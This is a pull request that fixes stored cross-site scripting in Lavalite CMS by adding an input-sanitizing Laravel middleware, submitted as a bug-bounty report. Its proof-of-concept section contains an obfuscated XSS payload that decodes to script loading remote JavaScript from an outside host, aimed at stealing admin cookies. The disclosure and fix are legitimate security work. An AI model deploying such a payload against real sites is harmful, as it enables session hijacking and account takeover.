### PR TITLE
Fix XSS

### DIFF
--- a/app/Http/Kernel.php
+++ b/app/Http/Kernel.php
@@ -19,6 +19,7 @@ class Kernel extends HttpKernel
         \App\Http\Middleware\TrimStrings::class,
         \Illuminate\Foundation\Http\Middleware\ConvertEmptyStringsToNull::class,
         \App\Http\Middleware\TrustProxies::class,
+        \App\Http\Middleware\SanitizeInput::class,
     ];
 
     /**

--- a/app/Http/Middleware/SanitizeInput.php
+++ b/app/Http/Middleware/SanitizeInput.php
@@ -1,0 +1,46 @@
+<?php
+
+namespace App\Http\Middleware;
+
+use Illuminate\Foundation\Http\Middleware\TransformsRequest as Middleware;
+
+use Illuminate\Support\Facades\Log;
+
+class SanitizeInput extends Middleware
+{
+    /**
+     * Handle an incoming request.
+     *
+     * @param  \Illuminate\Http\Request  $request
+     * @param  \Closure  $next
+     * @return mixed
+     */
+    protected function transform($key, $value)
+    {
+
+        Log::critical($key);
+
+        if (in_array($key, $this->except, true)) {
+            return $value;
+        }
+        if (is_string($value) && $value !== '') {
+            $value = strip_tags($value);
+            $value = htmlentities($value, ENT_QUOTES, 'utf-8');
+        }
+        return $value;
+    }
+
+    /**
+     * The names of the attributes that should not be trimmed.
+     *
+     * @var array
+     */
+    protected $except = [
+        'password',
+        'password_confirmation',
+        '_token',
+        ''
+    ];
+
+}
+


### PR DESCRIPTION
### 📊 Metadata *

#### Bounty URL: https://www.huntr.dev/bounties/3-packagist-lavalite%2Fcms

### ⚙️ Description *

Admin cookies and other details leading to an account take over to a higher level privilege from a client account of lavalite CMS and other multiple XSS in different pages due to acceptance of unsanitised data.

### 💻 Technical Description *

Fixed by implementing sanitizing middleware

### 🐛 Proof of Concept (PoC) *

1. Login to client account and admin account from entirely different browsers or through a private mode.
2. In the client account click on settings and update the address column with the blind payload and save the updates made.
```
"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYmVlZmVlLnhzcy5odCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs&#61; onerror=eval(atob(this.id))>
```
3. From the admin account move to the end point http://localhost/admin/user/client .
4. Booyah!!! XSS triggered.

![Captura de pantalla de 2020-10-22 14-38-42](https://user-images.githubusercontent.com/7505980/97432213-a73d4d00-192c-11eb-94d4-224d5ad957d2.png)

### 🔥 Proof of Fix (PoF) *

After fix all input will be sanitized prior to being inserted and html components will be stripped from input

![Captura de pantalla de 2020-10-22 14-38-53](https://user-images.githubusercontent.com/7505980/97432229-b02e1e80-192c-11eb-8732-a71c9d81117c.png)


### 👍 User Acceptance Testing (UAT)

Application works normally